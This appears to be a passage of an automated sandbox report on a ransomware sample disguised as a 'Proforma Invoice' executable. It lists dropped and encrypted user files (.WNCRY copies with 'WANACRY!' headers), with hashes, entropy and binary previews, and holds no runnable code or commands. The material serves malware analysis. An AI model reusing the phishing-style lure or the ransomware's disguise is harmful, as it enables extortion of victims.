                                                          Preview:WANACRY!.....6..2.&......\z...1E...L....X._..Q..;.(.S:[...L.+..R...`q....#\=...#..q.4^..?@..W......1.9].1...~G..+u..\_.,..Y.3.q.$6..U...v.P.Bx]..)3ij..W.:............>.1.t9U.;~....c~3f..zw...m...E.K..........P.Q.k...-...m.].I...U.`.'...:R...d...W.~........$......].U..Y.....L..:'P..B.r.n..1.....-h+.1.....=k.....D.{7.E.u..p..k./..n*....-..*j..+.;B[....O......Z...x}cY..4.....g...iS.._......:...vI.:Y4.4N.y..=gD.K.|.."k.3..N9..Z...V..@2.~>d.}.)..D.M..Z........8.fp..4..p..1Ck..s....Xc...`.2.Z..3')iQ.Q4e .~.C..|Jp..JQk..[O..c=b..\\w...25...Rg%.H.....e..X....\.D.E..l.eC..:..m...N9...Z<~I#...-......|...n.*...$.WMn.$.(.....#........v.e.,.y.GS.......w+..m..+C.~.d.rFF....4rq1..........6..7..9.....*o>......fF..........CQ=9..I...!....E\=cT..../.pW..c..C.?..@`.1..x}2...N...:-...../b.A2.mk.B5..).H...].J.r..e..5.I..`o.H.....Z.t..M..@..*..{0...N....D.]...].}.v...+H,.e.^."t{"...`a.....hi.J>...7n..@...G....m.a.U.`5<l.mXbi.......?:.M..;].......q.k.qYM{.

                                                          C:\Users\user\Documents\QFAPOWPAFG.mp3

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1026
                                                          Entropy (8bit):7.811154944660018
                                                          Encrypted:false
                                                          SSDEEP:24:+vsunKW+c6jQiFxSePvnbvPY0Fu0VCEkR1bUhj9:1aSBUO3PvbvQ0KN74D
                                                          MD5:538C27E0F6B1001FD601196518FEE4D8
                                                          SHA1:6D5D5F0F81107F3D9918148816496944BED85A50
                                                          SHA-256:0B430FA884CD62DBAC765F89B8784D25BFD82B9C503126A3CF383A23C18991DC
                                                          SHA-512:118C8A9FB63E9DA7CC262C93997339CF622D0A9149C1E5CD82D658E7241773577D31E17644B64CE801AD08924B11606B5D14197F647688EA3272110F51EB438F
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:..'..#V.......)...W...s.b...A<*i....|..o..9...j...3..m.\H.;.fY.'....L..7L....D...8..J..--s.... .y`.w.m.-.........;=..^.*Y*.%......9..........WZPc{...$XX."...7.......1z~...k...L6......c.o.Y.)w!.....s..L......F...&.Q<(o.....f#....._.[.9.......~..X>.C[............B..Hr..#bL....%.X/.Y..-u..>8.).g."!.y.........n..P+..5.Dr.........7..>l..+)u.).E..#...(.A..J.....>.....l....MfC..VSc..5cB...a[.E6..W]r..N..91...9...D.V.d.&.".|..@.f+....!....E...H#.{......3........Q.........l....'0.....F.'.<.....8h..>Nw..pn..)...h.LI..?..5..,u.bz...(.Jx..4..p.,...M..0..mP.&..Y...M|r.g.......bt..#......-...1...;.+0trUL...(...G.d..I>.'?.*.);.p4..[m..f!..j.-..A....Q..6..K./6 5.Og.I.;...s.....c.tV2t..;.....X..eobr....Bu......s.x.+...}.Q;.."..E...}..=.^?......]pyR....W.&.x..q.$...t...l,eC..:.,q.,....i.....o5..Y....v......8...}...".\e...+..*.$y.._....7t...Fq_..&s.|.}7.u.5$...L.->.{.W .s&..B.)e.....ty.8..1.tqW5....r{+..,a..I....m..Bj.....#..+..F].....ELh..FG....!.7...&$?)...v.

                                                          C:\Users\user\Documents\QFAPOWPAFG.mp3.WNCRY (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1320
                                                          Entropy (8bit):7.854290632279905
                                                          Encrypted:false
                                                          SSDEEP:24:bkw2OSUWQ0GGAVN2/0MDKVRk+FSaEe/3QMhYi/vkb0mSTD11qT+:bk7OSHQ0uS/ZKc+FSG/3QMhYysQWK
                                                          MD5:BB99840A84409677E057E126DA476185
                                                          SHA1:8C0D67778E091480B1F1EA6D5A60C334D552101D
                                                          SHA-256:158F26FDC3BBF49CA1104033FA853141C443C54C2750E5C7DE6650122426A4DB
                                                          SHA-512:59A29D6C6B85F6F97F76EA6CE54D48CE03F13B162A823539D858C4DCD375C0619043793312B92388D00FFD04781E55EE6434B8175FE85526A7B54668A02D87D9
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!......wT.q.v...C.......>D..!...`..hIP...w...80.}1.3....>x.........q]`<..Z....$c...~)..T..L*. -p..R....G.sO......q2...4.-.I]GWu.Y.@.}.x.*.I.L.G..#....;(y........KEG..H]O.....y..5..g?.W...[.4.D_;Kc...L...@Q.(L.NN.x..yX.B...1.:.+x..U+......Kz..(.j9M#...............a.[...H..w.e..?n.. l.-....[.LD...........'~B.TT.j7J.2..o..a|$.!.....Nr7.C.I..V...F$....=.`.Tq.'."?..:..W.....W.WJx.u.Z.........<.Y.."...-9M.MV....%.>...91.....7.....M2]b...9:..U.?d3....qG..Fg.`$..0_.:.d.[L"0!....\.3.x.<K..s[.....%..=a.i,.x.....-...X..eDv.._.x.)..b.......A.U...q.!o.Ve.%^9.ch....t..z....\....;.<..PX..l-....S....X|n.t.,B.p..Q......j...3?.._..1.Q......t..!%1%.".o.,%.....z.......C..../..Y.$R.......)F.{.(@....R....:y...;D..c.......L:{.`.V..dV.R..?.V.P7..../%.?..R..j..0.T...3..J.k....xB..!....}...a=+.xgF=.....j..@....&J...|?..:.........]K.2f...w.!@.......a.S......4...$..(... .Z.B.]{f...z...v...,.;.....}..O..=.fie0.C..ak\....A..9Ut..j..K.HRG..l7A..r=..."&..&

                                                          C:\Users\user\Documents\QFAPOWPAFG.mp3.WNCRYT

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1320
                                                          Entropy (8bit):7.854290632279905
                                                          Encrypted:false
                                                          SSDEEP:24:bkw2OSUWQ0GGAVN2/0MDKVRk+FSaEe/3QMhYi/vkb0mSTD11qT+:bk7OSHQ0uS/ZKc+FSG/3QMhYysQWK
                                                          MD5:BB99840A84409677E057E126DA476185
                                                          SHA1:8C0D67778E091480B1F1EA6D5A60C334D552101D
                                                          SHA-256:158F26FDC3BBF49CA1104033FA853141C443C54C2750E5C7DE6650122426A4DB
                                                          SHA-512:59A29D6C6B85F6F97F76EA6CE54D48CE03F13B162A823539D858C4DCD375C0619043793312B92388D00FFD04781E55EE6434B8175FE85526A7B54668A02D87D9
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!......wT.q.v...C.......>D..!...`..hIP...w...80.}1.3....>x.........q]`<..Z....$c...~)..T..L*. -p..R....G.sO......q2...4.-.I]GWu.Y.@.}.x.*.I.L.G..#....;(y........KEG..H]O.....y..5..g?.W...[.4.D_;Kc...L...@Q.(L.NN.x..yX.B...1.:.+x..U+......Kz..(.j9M#...............a.[...H..w.e..?n.. l.-....[.LD...........'~B.TT.j7J.2..o..a|$.!.....Nr7.C.I..V...F$....=.`.Tq.'."?..:..W.....W.WJx.u.Z.........<.Y.."...-9M.MV....%.>...91.....7.....M2]b...9:..U.?d3....qG..Fg.`$..0_.:.d.[L"0!....\.3.x.<K..s[.....%..=a.i,.x.....-...X..eDv.._.x.)..b.......A.U...q.!o.Ve.%^9.ch....t..z....\....;.<..PX..l-....S....X|n.t.,B.p..Q......j...3?.._..1.Q......t..!%1%.".o.,%.....z.......C..../..Y.$R.......)F.{.(@....R....:y...;D..c.......L:{.`.V..dV.R..?.V.P7..../%.?..R..j..0.T...3..J.k....xB..!....}...a=+.xgF=.....j..@....&J...|?..:.........]K.2f...w.!@.......a.S......4...$..(... .Z.B.]{f...z...v...,.;.....}..O..=.fie0.C..ak\....A..9Ut..j..K.HRG..l7A..r=..."&..&

                                                          C:\Users\user\Documents\QFAPOWPAFG.pdf

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1026
                                                          Entropy (8bit):7.810758549870751
                                                          Encrypted:false
                                                          SSDEEP:24:9d90c6w7EJRBjg1hPnCXFghSRhIL36doDeJg5cTQ7w5eIFhyyti:9d9v6zX+HCSh2SLqdeeJ7AIFzi
                                                          MD5:A8FB0D9DA12BC0ED3069A43F9523A76E
                                                          SHA1:64F12CB25542A4185A09A3CC01FBE01333A288F5
                                                          SHA-256:B3ACE87709EF359B262C7C91E4466D7C970651D348DEB75A25F28C386B7CB2B8
                                                          SHA-512:90722DAA590FAEFAE52FCFA3A02DC7F757B890EB90DF68937A86FB122ED50A5298E0F863ABF6B0612563A586ED3F85DD3B108E3D058451BAE98600842F310988
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:m.a........>a..=<MB...0.@. Yy..?f.W.*..F.q.....I.[......S\.%......0..|..u.N..J..n.b..3[?......NK.5s.2..........X.nHg.....D..6.y.!..!..s..E.k}..a..>K .Vz.../6..D.*.b..K..a.i.0<@n.....ZP."..W.....f.>.G=...A.X.%h....*z......?$$..!+.$!E>.}..{!...R."~._,....<..K:$........i...B...Xhi..,. .;.M`o....Z..d......wQ.9...t-.$...xW.G..^.Y........j..Br....j.G2..:.zY.*.....c~.EZ.7.\..w.&,.4.X.....h.*om...!.t..%k.X......g.N..}^..wt.7.c.0:(..(...{*.k#..d...N..r\....hC.cv=X.t...RF.;..'.@H.n8rd.B|~........&{.......a..a..J..f....L..Bk..K...."4Og..r.l.%......c..u...R.g.}..v..0....+.>..C..Rj.G..m.P..o."..k...l.H......<......\...J.:..k7..|.%...B}t.dO.:....[...5V.x.A........v.&nJ...m..(4.............X.,r.p.k3..:...l...j~.......a+.?......Hj..o.."..|xcY.........;.......g.I.^..qrh.qL.'..&.V...w.5....S.o....m....M...Q...<.1....~.....m..,."|..lDl/.jK....e.+\..t.Y... .J..6..ZU1.~..7..L.u..o.~.m4.....m..:^.._k.M,.7u....Q.cp.Y.p...............,&........N*.

                                                          C:\Users\user\Documents\QFAPOWPAFG.pdf.WNCRY (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1320
                                                          Entropy (8bit):7.829092780690106
                                                          Encrypted:false
                                                          SSDEEP:24:bkwiflOlGjt2boMa7+DudGL/vuUdD7gccdHn6EsElijZejeJVxbnlui0nfBfQRA/:bkwylJ2bM7hgL3uUdD7gccN6D+iQiAdd
                                                          MD5:718E37FA552AF943FFF075CD6FD0FE48
                                                          SHA1:459B7082E366488E219C51531770555FFE56B85A
                                                          SHA-256:C0DBD19DEBB562BD1C94C726DB6D870C6C0D9A9F517A18FAE1798040877268B9
                                                          SHA-512:54BCACCD1F0DA0FC523FC3587F5613A8DD0816AA68F31FBABC0F4B71C8A7C2AA60B2FC516196969D896B628085E2E81F232F92D30D587B7F9DA7E9BD8A417245
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!....a2.y...D...}d.....:.6./..ET)..H...B.....#......8)c:..f....[!.UWH.X.$e..A.L\YW...I.../;{d._....l..q.....;c.....E.u.f.+.|.e.o.~"9.P.y\.S..-#...^...5...K.`p.....C.>.n..08.Ut=........:X...c..]).4.......7..k..y..(`.....=...m?...zv.|..^m...*..{..8.m.............3.'.P..vL.PY...uAG.#...)...a...s..j..P\..#ky..2.2`R~..7.._?c......r.Tm.E..b.^S0..[.q8.`h.p:z.....=P.Y.ZR2P..Ld..i.....W.d...A...[.M.E....V6.&w.K*.Co..a..r.<.....o.o.....M.(.../.4.pF....7.8,.Or...q2|\../:.&.........T....d........,..4.-.."..'b..-e....[.).....(/.....+..c.n.-W"K5Ya...#/....!..(.\m.........9#....f.aa:....9..6..?...$.u.".=......%..33.Y....w.G......Aw]V$.v...p...C&obS1<Zi6/v.T..%_.".....xd.v(/W.z.;7>|.B.Q0.,.....m.}.>2..ZO..W.?.N$.M....+.(.$X}!..8gn\.....d).........d...^.fs]fUCA.G..B8.)......[.m....H-..n.~4 b.........6.X`.....d..?.U.....?..A!.k..~...N!L.|...F........wM{.....%.........E..a.D.......4e..#I-qI".^K.A.-..|_#w...hs.5P..B.."..N..E'....f!....fm.[..0...

                                                          C:\Users\user\Documents\QFAPOWPAFG.pdf.WNCRYT

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1320
                                                          Entropy (8bit):7.829092780690106
                                                          Encrypted:false
                                                          SSDEEP:24:bkwiflOlGjt2boMa7+DudGL/vuUdD7gccdHn6EsElijZejeJVxbnlui0nfBfQRA/:bkwylJ2bM7hgL3uUdD7gccN6D+iQiAdd
                                                          MD5:718E37FA552AF943FFF075CD6FD0FE48
                                                          SHA1:459B7082E366488E219C51531770555FFE56B85A
                                                          SHA-256:C0DBD19DEBB562BD1C94C726DB6D870C6C0D9A9F517A18FAE1798040877268B9
                                                          SHA-512:54BCACCD1F0DA0FC523FC3587F5613A8DD0816AA68F31FBABC0F4B71C8A7C2AA60B2FC516196969D896B628085E2E81F232F92D30D587B7F9DA7E9BD8A417245
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!....a2.y...D...}d.....:.6./..ET)..H...B.....#......8)c:..f....[!.UWH.X.$e..A.L\YW...I.../;{d._....l..q.....;c.....E.u.f.+.|.e.o.~"9.P.y\.S..-#...^...5...K.`p.....C.>.n..08.Ut=........:X...c..]).4.......7..k..y..(`.....=...m?...zv.|..^m...*..{..8.m.............3.'.P..vL.PY...uAG.#...)...a...s..j..P\..#ky..2.2`R~..7.._?c......r.Tm.E..b.^S0..[.q8.`h.p:z.....=P.Y.ZR2P..Ld..i.....W.d...A...[.M.E....V6.&w.K*.Co..a..r.<.....o.o.....M.(.../.4.pF....7.8,.Or...q2|\../:.&.........T....d........,..4.-.."..'b..-e....[.).....(/.....+..c.n.-W"K5Ya...#/....!..(.\m.........9#....f.aa:....9..6..?...$.u.".=......%..33.Y....w.G......Aw]V$.v...p...C&obS1<Zi6/v.T..%_.".....xd.v(/W.z.;7>|.B.Q0.,.....m.}.>2..ZO..W.?.N$.M....+.(.$X}!..8gn\.....d).........d...^.fs]fUCA.G..B8.)......[.m....H-..n.~4 b.........6.X`.....d..?.U.....?..A!.k..~...N!L.|...F........wM{.....%.........E..a.D.......4e..#I-qI".^K.A.-..|_#w...hs.5P..B.."..N..E'....f!....fm.[..0...

                                                          C:\Users\user\Documents\VWDFPKGDUF.jpg

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1026
                                                          Entropy (8bit):7.81348050833733
                                                          Encrypted:false
                                                          SSDEEP:24:IZmmNtOsTXd6dcYWI+l8FdUhzGxgiciItOW5LGQkNl6pMSVqG8dcKr/ZZmPXjA3L:IZtXXdycYY2whCxht8OsqzNXSVqGNwZp
                                                          MD5:D0ED687EBF08BA1A0EA29BAB2BFCE09C
                                                          SHA1:FF4D4CC06F96BA11D63E4F35F315E6D277FB4D8E
                                                          SHA-256:C78B3B0B08E8D5D604B5885BDA88D7BA8FE7ADD8CE3E7F26EBF7FCFBCC791023
                                                          SHA-512:3E6A94EE9844445A8B05F4898213ABA6C834ECB61831B478D5409900A2B34157ACAE51B6724895B837173B59974077B30104858B5A48C0BAC6C2B211C725E411
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:..f...w..d~.S..S....m.........J..I..c.?...5..........[.l>..../ ..j....w#..Eq..s7./]...d.....;..c.._SmC.m<..9.$%..#....-.....}...m@eCb.Y...}....#.6...z..S.>..F... .~?Qp..E&.q....r?@f ..:F_..#.K.c.......5.Y.E..X.........^L..D...*A...o. .Z...m..N.!..) O..>..&.p7....,..=..&S.(...Z.Z....L.g...l...^7.%.x...+y......&9(..z..M.w....S.Q=..K..5,....Z.W....L....}z.Ij...N.......#..S....1a....>(p..b...+.ba........<M.<.}.^.j...*%EE..7.f...^t...KUH-5..........R7...F..W.9...>....L..........Z.....v>t./b.5...p+.}...2.xb.%Y~........F.%..`......R..}...]..q.5.x!..{..MiP=.....n../....h..V~...udN.<Eb.^....%...........s........\...T..G...=-d4">. ..pX4....=..V..7...B..x...R.v.t..P....;Vk(.*.[...\2.......26.Mf..D..T..B.-.O<(:.)+Ku..?Q:!}.r...y?y)...2..-?B./.....o]....up@.@}G.5.....@.7......^...&.D.$...N.<w.....j....]kE.._.u.6....yE.../.S...F.6.pD.......i....8.1.R~......5.h........g...Kng1...4......+c.|*Yp.E.3.....oe.!F.6.........2e...O.wd.....>.....$..i.O...

                                                          C:\Users\user\Documents\VWDFPKGDUF.jpg.WNCRY (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1320
                                                          Entropy (8bit):7.858307702636891
                                                          Encrypted:false
                                                          SSDEEP:24:bkVzyv0EHujK0Dsi/BvE7ygVzYaFp5guFmPN5/JwRe8ukSH+lFFudMMA/rvvDEF/:bkVzrEOjxDsUBc7ygRYaFhaN5/2s8ukE
                                                          MD5:FFFE57061F92D300A2A20313E5448690
                                                          SHA1:AA432BD3E2D119BA9273CEAEA9BA452309706BA6
                                                          SHA-256:8CBBED3C9B05AC969170095890A4AC4972E2A417B2998056BFE989B53208AAFE
                                                          SHA-512:78D905BB7048C805446F16DFD625D8B5E736D56FBDCF70E9AA068435DE79BACD594135BBD8D4FB577485D87271983BE4BD5B90F220ED4AAC6C066BC77FD7780D
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!.......%..<.$0.hN.6T......U-.PT.:..[`4,..6.DU^.Ag.&=..H[0t.w.i..K.[8c...Mf.*~....uy...r...._.;<s.95..>=g.....b..7.s..}B..<..-K.A[.....C......#-OX)...-.n.!.....v-w.1*.....O*..Z..U..C.|J.#...8.....S{fp...t...s)...h.nZ_bX...i].U>.........swa.y...Q..............z..4..c..R/.I`rY.o...k....+j*]7....5.*J.C.^.O._...U.mjv.*..]a. ..k..s..x./.....?.....J...IZ..?../+..v.h1..._(+.#.......X...S......cA..BSnK.a....B{I.....p.~./.....Q.m.2vQ.s^.=...x..f.....[.....;7d....y......#l....P.P.$K...<ZOM9.>.x.-/?{\...X97....Q7G....<.p.k....+9.V||/]n..w.j.M.3{q.T.s....fg..9...3....2...D....bzARQ....H ..;.M..X.-./{.........e-...`2...9....p...@.....n......&..Mw...v.M..G...C...o...*..=V.....m.Q.....f.8..+.%......4....-b.TIq%....M..I....6............n.Lbn-fr...{nbHbE.q........,..Q..H.....q..9.K l.....hR...W.g:,#y<G..(...5s6.'9$6....#|...O...d.|.]R....G....d..4.+!....OP...1...v.N......8>..EUT.u18=.$`..%F.3|....~QPBnB.(.eh.....#..@.+...I/..7V#....i.X....4.l..#....

                                                          C:\Users\user\Documents\VWDFPKGDUF.jpg.WNCRYT

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1320
                                                          Entropy (8bit):7.858307702636891
                                                          Encrypted:false
                                                          SSDEEP:24:bkVzyv0EHujK0Dsi/BvE7ygVzYaFp5guFmPN5/JwRe8ukSH+lFFudMMA/rvvDEF/:bkVzrEOjxDsUBc7ygRYaFhaN5/2s8ukE
                                                          MD5:FFFE57061F92D300A2A20313E5448690
                                                          SHA1:AA432BD3E2D119BA9273CEAEA9BA452309706BA6
                                                          SHA-256:8CBBED3C9B05AC969170095890A4AC4972E2A417B2998056BFE989B53208AAFE
                                                          SHA-512:78D905BB7048C805446F16DFD625D8B5E736D56FBDCF70E9AA068435DE79BACD594135BBD8D4FB577485D87271983BE4BD5B90F220ED4AAC6C066BC77FD7780D
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!.......%..<.$0.hN.6T......U-.PT.:..[`4,..6.DU^.Ag.&=..H[0t.w.i..K.[8c...Mf.*~....uy...r...._.;<s.95..>=g.....b..7.s..}B..<..-K.A[.....C......#-OX)...-.n.!.....v-w.1*.....O*..Z..U..C.|J.#...8.....S{fp...t...s)...h.nZ_bX...i].U>.........swa.y...Q..............z..4..c..R/.I`rY.o...k....+j*]7....5.*J.C.^.O._...U.mjv.*..]a. ..k..s..x./.....?.....J...IZ..?../+..v.h1..._(+.#.......X...S......cA..BSnK.a....B{I.....p.~./.....Q.m.2vQ.s^.=...x..f.....[.....;7d....y......#l....P.P.$K...<ZOM9.>.x.-/?{\...X97....Q7G....<.p.k....+9.V||/]n..w.j.M.3{q.T.s....fg..9...3....2...D....bzARQ....H ..;.M..X.-./{.........e-...`2...9....p...@.....n......&..Mw...v.M..G...C...o...*..=V.....m.Q.....f.8..+.%......4....-b.TIq%....M..I....6............n.Lbn-fr...{nbHbE.q........,..Q..H.....q..9.K l.....hR...W.g:,#y<G..(...5s6.'9$6....#|...O...d.|.]R....G....d..4.+!....OP...1...v.N......8>..EUT.u18=.$`..%F.3|....~QPBnB.(.eh.....#..@.+...I/..7V#....i.X....4.l..#....

                                                          C:\Users\user\Documents\VWDFPKGDUF.xlsx

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1026
                                                          Entropy (8bit):7.812570552682323
                                                          Encrypted:false
                                                          SSDEEP:24:/z0FvCmTWgFZMqkIqkKwNHLd+Cx7UzBk62ThXueoePGnOJzn:/Iw6cqk6KwVdXA9kPTYeFPG6z
                                                          MD5:7D3B85F2F7A55D2CFD430DF3531406F9
                                                          SHA1:B001604DCCD7FA6E7326C9AC82974FEDD09A7A11
                                                          SHA-256:2FC0FB7D1E1DAF799884C1D98AF119A5C0B24D824EB9B144A5055C35A327DE13
                                                          SHA-512:6A465B3AFC6E9F21108A269FF5095FEA74C878AE8F98AF3458A5F65C78725B53283EF83B6C6C723B48994806FF56CD9765B77807FB6FE93659DD1579032EB6FE
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:.Ir(o...D..*...%.7u..CJ~.%W.......A.awX..7...AQ..wt.....U'V/...M._f6D..=...k.....EA..\.i.f< .R*.V..k.F.q.&..~...;.HO....q.Ub..r....L...p%r....S.K....,.w..^..Q^#n.....(......)h...<...,.GWp......<.`5hX..p.I9...O;..T:w3.....a6u.nX..k4^}?v.g^j.)>.f...r....q.5..W...DnP:o......._8.. k..}i....v?......e.Q.@\.....0.K.'J.<!2......`;.h.F\.S.t&?\HX.1s4.*.....[...A....X...u`M..W..q..V.b.5..qHI..1)%J.........m.....{....@...|..X....u(..(Z.g"...|...{..` +..~/>.....#."....`.h*,.*l^sG....e.&.I..km....6......<.&}R...F..u....*..g.>....DZ...Nwy0..-*.'.)=...../..<. .~9.._..w...F.ZyY......h@.{4....B..gG.......|,.jK..(#.......>.+"..0t_N..n1........OF.3..}b..q.kwp..D.e ..n...FO.../.\.&.... .!..S..Z..'.$....S.....j...).d.:G............Y...S.~|.I...N.....NA.w.A........b.[..<...L.i.2..`.,n.}<b.}c.....9..H&.a*..m[.vO.b..>..._...0........g..V..(..X..v9.o....|!.i......1P.)..l.ZZW"...<.......z?...M.....Oc..W,.../o.S.F<`.s..G.1~)]..I......&8.,9..x{...d..2.Y.....7......(>....O."<

                                                          C:\Users\user\Documents\VWDFPKGDUF.xlsx.WNCRY (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1320
                                                          Entropy (8bit):7.84304937150061
                                                          Encrypted:false
                                                          SSDEEP:24:bk0P2FgTlLVo+jVVnTnFr+BjWrC4i6nZ1s3oKB7WQeXxRXqm6Ys+f6:bkk2FMnTYBjj4i2s48R6IBK6
                                                          MD5:8E222719D9B1F91EF65A423AB4798461
                                                          SHA1:082606622DF199DF1DAF028DCFC01B22060011B6
                                                          SHA-256:B8DF46D262C3E85557C52FFD3CB4B133718A83F45D7EA2DBE71A16EA482C2381
                                                          SHA-512:F971633CE270BCBECC9BD8FAE7A858AD85880B6BD1C559E358461341F64FFB53667A7C7577482CCB01EDA9187B6022014A11055AD6F46887D6B909DD227DCC69
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!....B...j......G1.n}!.=NdM...>...N......'^.P.xny..IU..]S6...Sv|v.0.7."a&R..V.z#.$..#..j.AO.Os...........'.P..5.;.Sc........Y..$..FQ....g.Z.,...X.(N.HV.{..$Q..Y2).)T....&\.q.|....B./.{L..w...n.`.....&i..Tf.3..E....d.......~...*V.z.a..uA.Ur2.............c......I.)...9Rw.....%MlS..{w.H..-"...[.{93h.^Y-w.._.....a....~1.CPV't...`...R..v6.....4.9..n..t.!....<1.9..n.w-N&..Y&Q..JA.<...;.......3.t.n7:..!#.Ug..."...>,...Cuz..,Q.....S.@..>.....s.E...|..".u.#5;m........z.V.31e*.|q..q..f..8.N..tp...j0.M.?......o.X..P<.M..#.&.?*........'...|0f.Vu2..Y.h...[.....g~l..../.'..o5...@....:...r...Qs...%....S.M.c..m.v.:1q.B...T$\|S..1i.....U$..r..%..J1}zq.%2....[........r.....s.kK.8....@.2M. ....n{..UQv......B.n.Q^3.aS.z.......09E...Jo..|.......hn.^..Q??..&HB..R=.`9...z&.+.S....s|...........Ec.9..{...9.:*..%...c...q4..h..T...L...&.h....".4..].h.!Y...r.}:..G.S...hs..}2g...m...Dx.............M.s....n-..?(..m...y..2Do..$.\j%L..oF..ns.......oV..

                                                          C:\Users\user\Documents\VWDFPKGDUF.xlsx.WNCRYT

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1320
                                                          Entropy (8bit):7.84304937150061
                                                          Encrypted:false
                                                          SSDEEP:24:bk0P2FgTlLVo+jVVnTnFr+BjWrC4i6nZ1s3oKB7WQeXxRXqm6Ys+f6:bkk2FMnTYBjj4i2s48R6IBK6
                                                          MD5:8E222719D9B1F91EF65A423AB4798461
                                                          SHA1:082606622DF199DF1DAF028DCFC01B22060011B6
                                                          SHA-256:B8DF46D262C3E85557C52FFD3CB4B133718A83F45D7EA2DBE71A16EA482C2381
                                                          SHA-512:F971633CE270BCBECC9BD8FAE7A858AD85880B6BD1C559E358461341F64FFB53667A7C7577482CCB01EDA9187B6022014A11055AD6F46887D6B909DD227DCC69
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!....B...j......G1.n}!.=NdM...>...N......'^.P.xny..IU..]S6...Sv|v.0.7."a&R..V.z#.$..#..j.AO.Os...........'.P..5.;.Sc........Y..$..FQ....g.Z.,...X.(N.HV.{..$Q..Y2).)T....&\.q.|....B./.{L..w...n.`.....&i..Tf.3..E....d.......~...*V.z.a..uA.Ur2.............c......I.)...9Rw.....%MlS..{w.H..-"...[.{93h.^Y-w.._.....a....~1.CPV't...`...R..v6.....4.9..n..t.!....<1.9..n.w-N&..Y&Q..JA.<...;.......3.t.n7:..!#.Ug..."...>,...Cuz..,Q.....S.@..>.....s.E...|..".u.#5;m........z.V.31e*.|q..q..f..8.N..tp...j0.M.?......o.X..P<.M..#.&.?*........'...|0f.Vu2..Y.h...[.....g~l..../.'..o5...@....:...r...Qs...%....S.M.c..m.v.:1q.B...T$\|S..1i.....U$..r..%..J1}zq.%2....[........r.....s.kK.8....@.2M. ....n{..UQv......B.n.Q^3.aS.z.......09E...Jo..|.......hn.^..Q??..&HB..R=.`9...z&.+.S....s|...........Ec.9..{...9.:*..%...c...q4..h..T...L...&.h....".4..].h.!Y...r.}:..G.S...hs..}2g...m...Dx.............M.s....n-..?(..m...y..2Do..$.\j%L..oF..ns.......oV..

                                                          C:\Users\user\Documents\WSHEJMDVQC.png

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1026
                                                          Entropy (8bit):7.7934136993049234
                                                          Encrypted:false
                                                          SSDEEP:24:Zx18eP+SY6u6RMN9u9jkuAp/6Sxn8o9paG4RYGIOWpyMch:vtmSY6qN9u94uAl6Gn8GaG4RpxKyMch
                                                          MD5:CA84C077B82EA5A847AB245EA15728F7
                                                          SHA1:6B0B9D8B6F34EEE3739FF856A7636C8FDF0213C8
                                                          SHA-256:5563E2FE5F9A991636E46BBA70783A89362480763E0C69EA0EC62337C73877A9
                                                          SHA-512:B6F979148723EFAB947A01970A405F14052C3B24BD19620123E9EDF46EF8527BBC3CF1F4AF35F70EF060CAF8995C9D3A8C0F58791C62D22D88CCCA087D11D66C
                                                          Malicious:false
                                                          Reputation:unknown
